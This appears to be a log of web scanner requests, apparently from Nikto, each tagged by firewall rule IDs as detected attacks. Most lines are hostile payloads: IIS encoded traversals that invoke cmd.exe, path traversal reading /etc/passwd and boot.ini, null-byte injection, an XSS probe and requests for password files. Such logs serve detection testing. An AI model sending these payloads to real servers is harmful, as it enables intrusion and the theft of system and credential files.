Packet [1806]	Uri [/exchange/lib/GETWHEN.INC]	Nattacks [1 ]	Signatures	[920440]
Packet [1807]	Uri [/exchange/lib/JSATTACH.INC]	Nattacks [1 ]	Signatures	[920440]
Packet [1808]	Uri [/exchange/lib/JSROOT.INC]	Nattacks [1 ]	Signatures	[920440]
Packet [1809]	Uri [/exchange/lib/JSUTIL.INC]	Nattacks [1 ]	Signatures	[920440]
Packet [1810]	Uri [/exchange/lib/LANG.INC]	Nattacks [1 ]	Signatures	[920440]
Packet [1811]	Uri [/exchange/lib/logon.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [1812]	Uri [/exchange/lib/PAGEUTIL.INC]	Nattacks [1 ]	Signatures	[920440]
Packet [1813]	Uri [/exchange/lib/PUBFLD.INC]	Nattacks [1 ]	Signatures	[920440]
Packet [1814]	Uri [/exchange/lib/RENDER.INC]	Nattacks [1 ]	Signatures	[920440]
Packet [1815]	Uri [/exchange/lib/SESSION.INC]	Nattacks [1 ]	Signatures	[920440]
Packet [1817]	Uri [/global.asa]	Nattacks [1 ]	Signatures	[920440]
Packet [1820]	Uri [/iisadmpwd/..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1821]	Uri [/iisadmpwd/..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [3 ]	Signatures	[920272]	[930100]	[930110]
Packet [1822]	Uri [/iisadmpwd/aexSensePostNotThereNoNo.htr]	Nattacks [1 ]	Signatures	[920440]
Packet [1823]	Uri [/iisadmpwd/aexp2.htr]	Nattacks [1 ]	Signatures	[920440]
Packet [1824]	Uri [/iisadmpwd/aexp2b.htr]	Nattacks [1 ]	Signatures	[920440]
Packet [1825]	Uri [/iisadmpwd/aexp3.htr]	Nattacks [1 ]	Signatures	[920440]
Packet [1826]	Uri [/iisadmpwd/aexp3.htr]	Nattacks [1 ]	Signatures	[920440]
Packet [1827]	Uri [/iisadmpwd/aexp4.htr]	Nattacks [1 ]	Signatures	[920440]
Packet [1828]	Uri [/iisadmpwd/aexp4b.htr]	Nattacks [1 ]	Signatures	[920440]
Packet [1839]	Uri [/iissamples/exair/search/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini]	Nattacks [6 ]	Signatures	[920440]	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [1840]	Uri [/iissamples/exair/search/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini]	Nattacks [6 ]	Signatures	[920440]	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [1844]	Uri [/iissamples/exair/search/search.idq?CiTemplate=../../../../../../../../../../winnt/win.ini]	Nattacks [6 ]	Signatures	[920440]	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [1847]	Uri [/iissamples/issamples/fastq.idq?CiTemplate=../../../../../../../../../../winnt/win.ini]	Nattacks [6 ]	Signatures	[920440]	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [1848]	Uri [/iissamples/issamples/fastq.idq?CiTemplate=../../../../../../../../../../winnt/win.ini]	Nattacks [6 ]	Signatures	[920440]	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [1850]	Uri [/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qfullhit.htw&CiRestriction=none&CiHiliteType=Full]	Nattacks [1 ]	Signatures	[920440]
Packet [1851]	Uri [/iissamples/issamples/oop/qsumrhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qsumrhit.htw&CiRestriction=none&CiHiliteType=Full]	Nattacks [1 ]	Signatures	[920440]
Packet [1852]	Uri [/iissamples/issamples/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini]	Nattacks [6 ]	Signatures	[920440]	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [1858]	Uri [/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp]	Nattacks [3 ]	Signatures	[920272]	[930100]	[942460]
Packet [1859]	Uri [/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp]	Nattacks [3 ]	Signatures	[920272]	[930100]	[942460]
Packet [1860]	Uri [/iissamples/sdk/asp/docs/CodSensePostNotThereNoNo.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp]	Nattacks [3 ]	Signatures	[920272]	[930100]	[942460]
Packet [1861]	Uri [/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp]	Nattacks [3 ]	Signatures	[920272]	[930100]	[942460]
Packet [1864]	Uri [/iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp]	Nattacks [3 ]	Signatures	[920272]	[930100]	[942460]
Packet [1865]	Uri [/iissamples/sdk/asp/docs/WinSensePostNotThereNoNo.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp]	Nattacks [3 ]	Signatures	[920272]	[930100]	[942460]
Packet [1866]	Uri [/iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp]	Nattacks [3 ]	Signatures	[920272]	[930100]	[942460]
Packet [1867]	Uri [/iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp]	Nattacks [3 ]	Signatures	[920272]	[930100]	[942460]
Packet [1871]	Uri [/isapi/tstisapi.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [1879]	Uri [/UGYDZ.htw]	Nattacks [1 ]	Signatures	[920440]
Packet [1880]	Uri [/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1881]	Uri [/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1882]	Uri [/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1883]	Uri [/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1884]	Uri [/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [3 ]	Signatures	[920272]	[930100]	[930110]
Packet [1885]	Uri [/msadc/msaSensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [1886]	Uri [/msadc/msadcs.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [1889]	Uri [/msadc/Samples/selector/showcode.asp?source=/msadc/Samples/../../../../../../../../../winnt/win.ini]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930110]	[942460]
Packet [1890]	Uri [/nikto.ida]	Nattacks [1 ]	Signatures	[920440]
Packet [1896]	Uri [/null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full]	Nattacks [1 ]	Signatures	[920440]
Packet [1897]	Uri [/NULL.printer]	Nattacks [1 ]	Signatures	[920440]
Packet [1903]	Uri [/OpenFile.aspx?file=../../../../../../../../../../boot.ini]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [1904]	Uri [/pbserver/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1905]	Uri [/pbserver/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [3 ]	Signatures	[920272]	[930100]	[930110]
Packet [1906]	Uri [/pbserver/pbsSensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [1907]	Uri [/pbserver/pbserver.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [1910]	Uri [/prxdocs/misc/prxrch.idq?CiTemplate=../../../../../../../../../../winnt/win.ini]	Nattacks [6 ]	Signatures	[920440]	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [1911]	Uri [/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini]	Nattacks [6 ]	Signatures	[920440]	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [1914]	Uri [/rpc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1915]	Uri [/rpc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1916]	Uri [/rpc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [3 ]	Signatures	[920272]	[930100]	[930110]
Packet [1917]	Uri [/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1918]	Uri [/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ver]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1919]	Uri [/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [3 ]	Signatures	[920272]	[930100]	[930110]
Packet [1920]	Uri [/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir]	Nattacks [3 ]	Signatures	[920271]	[920272]	[930100]
Packet [1921]	Uri [/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\]	Nattacks [3 ]	Signatures	[920271]	[920272]	[930100]
Packet [1924]	Uri [/scripts/Carello/CarSensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [1925]	Uri [/scripts/Carello/Carello.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [1934]	Uri [/scripts/cpsSensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [1935]	Uri [/scripts/cpshost.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [1944]	Uri [/scripts/httSensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [1945]	Uri [/scripts/httpodbc.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [1946]	Uri [/scripts/iisadmin/bdiSensePostNotThereNoNo.htr]	Nattacks [1 ]	Signatures	[920440]
Packet [1947]	Uri [/scripts/iisadmin/bdir.htr]	Nattacks [1 ]	Signatures	[920440]
Packet [1948]	Uri [/scripts/iisadmin/ismSensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [1949]	Uri [/scripts/iisadmin/ism.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [1951]	Uri [/scripts/proxy/w3pSensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [1952]	Uri [/scripts/proxy/w3proxy.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [1955]	Uri [/scripts/samples/detSensePostNotThereNoNo.idc]	Nattacks [1 ]	Signatures	[920440]
Packet [1956]	Uri [/scripts/samples/details.idc]	Nattacks [1 ]	Signatures	[920440]
Packet [1957]	Uri [/scripts/samples/search/author.idq]	Nattacks [1 ]	Signatures	[920440]
Packet [1958]	Uri [/scripts/samples/search/filesize.idq]	Nattacks [1 ]	Signatures	[920440]
Packet [1959]	Uri [/scripts/samples/search/filetime.idq]	Nattacks [1 ]	Signatures	[920440]
Packet [1960]	Uri [/scripts/samples/search/qfullhit.htw]	Nattacks [1 ]	Signatures	[920440]
Packet [1961]	Uri [/scripts/samples/search/qsumrhit.htw]	Nattacks [1 ]	Signatures	[920440]
Packet [1962]	Uri [/scripts/samples/search/queryhit.idq]	Nattacks [1 ]	Signatures	[920440]
Packet [1963]	Uri [/scripts/samples/search/simple.idq]	Nattacks [1 ]	Signatures	[920440]
Packet [1964]	Uri [/scripts/samples/search/simple.idq]	Nattacks [1 ]	Signatures	[920440]
Packet [1965]	Uri [/scripts/tools/ctsSensePostNotThereNoNo.idc]	Nattacks [1 ]	Signatures	[920440]
Packet [1966]	Uri [/scripts/tools/ctss.idc]	Nattacks [1 ]	Signatures	[920440]
Packet [1979]	Uri [/servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [2030]	Uri [/ssi/envout.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [2031]	Uri [/trace.axd]	Nattacks [1 ]	Signatures	[920440]
Packet [2040]	Uri [//WebSensePostNotThereNoNo.dll?View=Logon]	Nattacks [1 ]	Signatures	[920440]
Packet [2041]	Uri [/WebAdmin.dll?View=Logon]	Nattacks [1 ]	Signatures	[920440]
Packet [2042]	Uri [/whatever.htr]	Nattacks [1 ]	Signatures	[920440]
Packet [2043]	Uri [//whaSensePostNotThereNoNo.htr]	Nattacks [1 ]	Signatures	[920440]
Packet [2044]	Uri [/whatever.htr]	Nattacks [1 ]	Signatures	[920440]
Packet [2045]	Uri [//WS_SensePostNotThereNoNo.LOG]	Nattacks [1 ]	Signatures	[920440]
Packet [2046]	Uri [/WS_FTP.LOG]	Nattacks [1 ]	Signatures	[920440]
Packet [2047]	Uri [/admin-serv/tasks/configuration/ViewLog?file=passwd&num=5000&str=&directories=admin-serv%2Flogs%2f..%2f..%2f..%2f..%2f..%2f..%2fetc&id=admin-serv]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [2066]	Uri [/.nsf/../winnt/winSensePostNotThereNoNo.ini]	Nattacks [4 ]	Signatures	[920440]	[930100]	[930110]	[930110]
Packet [2067]	Uri [/.nsf/../winnt/win.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [2444]	Uri [/LOGIN.PWD]	Nattacks [1 ]	Signatures	[920440]
Packet [2453]	Uri [/_vti_pvt/administrators.pwd]	Nattacks [1 ]	Signatures	[920440]
Packet [2454]	Uri [/_vti_pvt/authors.pwd]	Nattacks [1 ]	Signatures	[920440]
Packet [2455]	Uri [/_vti_pvt/users.pwd]	Nattacks [1 ]	Signatures	[920440]
Packet [2459]	Uri [/.nsconfig]	Nattacks [1 ]	Signatures	[930130]
Packet [2475]	Uri [/PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [2478]	Uri [/search?NS-query-pat=../../../../../../../../../../etc/passwd]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [2479]	Uri [/search?NS-query-pat=..\..\..\..\..\..\..\..\..\..\boot.ini]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [2500]	Uri [/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../system/autoexec.ncf]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [2501]	Uri [/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../system/autoexec.ncf]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [2504]	Uri [/nsn/..%5Cutil/attSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2505]	Uri [/nsn/..%5Cutil/attSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2506]	Uri [/nsn/..%5Cutil/attrib.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2507]	Uri [/nsn/..%5Cutil/chkSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2508]	Uri [/nsn/..%5Cutil/chkvol.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2509]	Uri [/nsn/..%5Cutil/copSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2510]	Uri [/nsn/..%5Cutil/copy.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2511]	Uri [/nsn/..%5Cutil/delSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2512]	Uri [/nsn/..%5Cutil/del.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2513]	Uri [/nsn/..%5Cutil/dirSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2514]	Uri [/nsn/..%5Cutil/dir.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2515]	Uri [/nsn/..%5Cutil/dsbSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2516]	Uri [/nsn/..%5Cutil/dsbrowse.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2517]	Uri [/nsn/..%5Cutil/gliSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2518]	Uri [/nsn/..%5Cutil/glist.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2519]	Uri [/nsn/..%5Cutil/lanSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2520]	Uri [/nsn/..%5Cutil/lancard.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2521]	Uri [/nsn/..%5Cutil/md.SensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2522]	Uri [/nsn/..%5Cutil/md.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2523]	Uri [/nsn/..%5Cutil/rd.SensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2524]	Uri [/nsn/..%5Cutil/rd.SensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2525]	Uri [/nsn/..%5Cutil/rd.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2526]	Uri [/nsn/..%5Cutil/renSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2527]	Uri [/nsn/..%5Cutil/ren.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2528]	Uri [/nsn/..%5Cutil/senSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2529]	Uri [/nsn/..%5Cutil/send.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2530]	Uri [/nsn/..%5Cutil/setSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2531]	Uri [/nsn/..%5Cutil/set.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2532]	Uri [/nsn/..%5Cutil/sliSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2533]	Uri [/nsn/..%5Cutil/slist.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2534]	Uri [/nsn/..%5Cutil/typSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2535]	Uri [/nsn/..%5Cutil/type.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2536]	Uri [/nsn/..%5Cutil/useSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2537]	Uri [/nsn/..%5Cutil/userlist.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2538]	Uri [/nsn/..%5Cweb/envSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2539]	Uri [/nsn/..%5Cweb/env.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2540]	Uri [/nsn/..%5Cweb/fdiSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2541]	Uri [/nsn/..%5Cweb/fdir.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2542]	Uri [/nsn/..%5Cwebdemo/envSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2543]	Uri [/nsn/..%5Cwebdemo/env.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2544]	Uri [/nsn/..%5Cwebdemo/fdiSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2545]	Uri [/nsn/..%5Cwebdemo/fdir.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2583]	Uri [/servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../boot.ini%00]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [2584]	Uri [/servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../boot.ini%00]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [2585]	Uri [/servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../etc/passwd%00]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [2593]	Uri [/test.php?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x]	Nattacks [8 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942130]	[942370]	[942431]	[942511]
Packet [2595]	Uri [/test.shtml?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x]	Nattacks [8 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942130]	[942370]	[942431]	[942511]
Packet [2598]	Uri [/cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Fping.exe%20127.0.0.1]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [2600]	Uri [/cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%69%6E%64%6F%77%73%2Fping.exe%20127.0.0.1]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [2601]	Uri [/cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%69%6E%64%6F%77%73%2Fping.exe%20127.0.0.1]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [2610]	Uri [/ht_root/wwwroot/-/local/httpd$map.conf]	Nattacks [1 ]	Signatures	[920440]
Packet [2613]	Uri [/local/httpd$map.conf]	Nattacks [1 ]	Signatures	[920440]
Packet [2618]	Uri [/%00/]	Nattacks [3 ]	Signatures	[920270]	[920271]	[920272]
Packet [2619]	Uri [/%00/]	Nattacks [3 ]	Signatures	[920270]	[920271]	[920272]
Packet [2620]	Uri [/%00/]	Nattacks [3 ]	Signatures	[920270]	[920271]	[920272]
Packet [2621]	Uri [/%00/]	Nattacks [3 ]	Signatures	[920270]	[920271]	[920272]
Packet [2622]	Uri [/%00/]	Nattacks [3 ]	Signatures	[920270]	[920271]	[920272]
Packet [2633]	Uri [/index.jsp%00x]	Nattacks [3 ]	Signatures	[920270]	[920271]	[920272]
Packet [2635]	Uri [/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../boot.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [2636]	Uri [/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2637]	Uri [/%a%s%p%d]	Nattacks [2 ]	Signatures	[920220]	[920272]
Packet [2642]	Uri [/.psql_history]	Nattacks [1 ]	Signatures	[930130]
Packet [2647]	Uri [//accSensePostNotThereNoNo.log]	Nattacks [1 ]	Signatures	[920440]
Packet [2648]	Uri [/access.log]	Nattacks [1 ]	Signatures	[920440]
Packet [2775]	Uri [/ccbill/secure/ccbSensePostNotThereNoNo.log]	Nattacks [1 ]	Signatures	[920440]
Packet [2776]	Uri [/ccbill/secure/ccbill.log]	Nattacks [1 ]	Signatures	[920440]
Packet [2842]	Uri [//danSensePostNotThereNoNo.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [2843]	Uri [/dan_o.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [2963]	Uri [/HyperStat/staSensePostNotThereNoNo.log]	Nattacks [1 ]	Signatures	[920440]
Packet [2964]	Uri [/HyperStat/stat_what.log]	Nattacks [1 ]	Signatures	[920440]
Packet [2965]	Uri [/hyperstat/staSensePostNotThereNoNo.log]	Nattacks [1 ]	Signatures	[920440]
Packet [2966]	Uri [/hyperstat/stat_what.log]	Nattacks [1 ]	Signatures	[920440]
Packet [3136]	Uri [/orders/mouSensePostNotThereNoNo.cfg]	Nattacks [1 ]	Signatures	[920440]
Packet [3137]	Uri [/orders/mountain.cfg]	Nattacks [1 ]	Signatures	[920440]
Packet [3138]	Uri [/orders/ordSensePostNotThereNoNo.log]	Nattacks [1 ]	Signatures	[920440]
Packet [3139]	Uri [/orders/orders.log]	Nattacks [1 ]	Signatures	[920440]
Packet [3282]	Uri [//ss.SensePostNotThereNoNo.cfg]	Nattacks [1 ]	Signatures	[920440]
Packet [3283]	Uri [/ss.cfg]	Nattacks [1 ]	Signatures	[920440]
Packet [3467]	Uri [//carSensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [3468]	Uri [/carbo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [3493]	Uri [/scripts/cphSensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [3494]	Uri [/scripts/cphost.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [3499]	Uri [/scripts/samples/ctgSensePostNotThereNoNo.idc]	Nattacks [1 ]	Signatures	[920440]
Packet [3500]	Uri [/scripts/samples/ctguestb.idc]	Nattacks [1 ]	Signatures	[920440]
Packet [3521]	Uri [/cgi-dos/args.bat]	Nattacks [1 ]	Signatures	[920440]
Packet [3598]	Uri [/boilerplate.asp?NFuse_Template=../../boot.ini&amp;NFuse_CurrentFolder=/SSLx0020Directories|-|0|404_Object_Not_Found]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [3682]	Uri [//emuSensePostNotThereNoNo.cgi?type=.%00]	Nattacks [3 ]	Signatures	[920270]	[920271]	[920272]
Packet [3683]	Uri [/emumail.cgi?type=.%00]	Nattacks [3 ]	Signatures	[920270]	[920271]	[920272]
Packet [3716]	Uri [/forum-ra.asp?n=../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [3717]	Uri [/forum-ra.asp?n=../../../../../../../../../etc/passwd%00]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [3718]	Uri [/forum-ra.asp?n=/../../../../../../../../../../../boot.ini]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [3719]	Uri [/forum-ra.asp?n=/.\./.\./.\./.\./.\./boot.ini]	Nattacks [4 ]	Signatures	[930110]	[930110]	[930120]	[942460]
Packet [3720]	Uri [/forum-ra.asp?n=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [3721]	Uri [/forum-ra.asp?n=/etc/passwd%00]	Nattacks [5 ]	Signatures	[920270]	[920271]	[920272]	[930120]	[932160]
Packet [3722]	Uri [/forum-ra.asp?n=c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [3723]	Uri [/forum-ra.asp?n=c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [3724]	Uri [/forum-ra_professionnel.asp?n=%60/etc/passwd%60]	Nattacks [5 ]	Signatures	[930120]	[932105]	[932160]	[942110]	[942260]
Packet [3725]	Uri [/forum-ra_professionnel.asp?n=../../../../../../../../../etc/passwd%00]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [3726]	Uri [/forum-ra_professionnel.asp?n=../../boot.ini]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [3727]	Uri [/forum-ra_professionnel.asp?n=/....../boot.ini]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [3728]	Uri [/forum-ra_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [3729]	Uri [/forum-ra_professionnel.asp?n=/../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [3730]	Uri [/forum-ra_professionnel.asp?n=/../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [3731]	Uri [/forum-ra_professionnel.asp?n=/.\./.\./.\./.\./.\./boot.ini]	Nattacks [4 ]	Signatures	[930110]	[930110]	[930120]	[942460]
Packet [3732]	Uri [/forum-ra_professionnel.asp?n=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
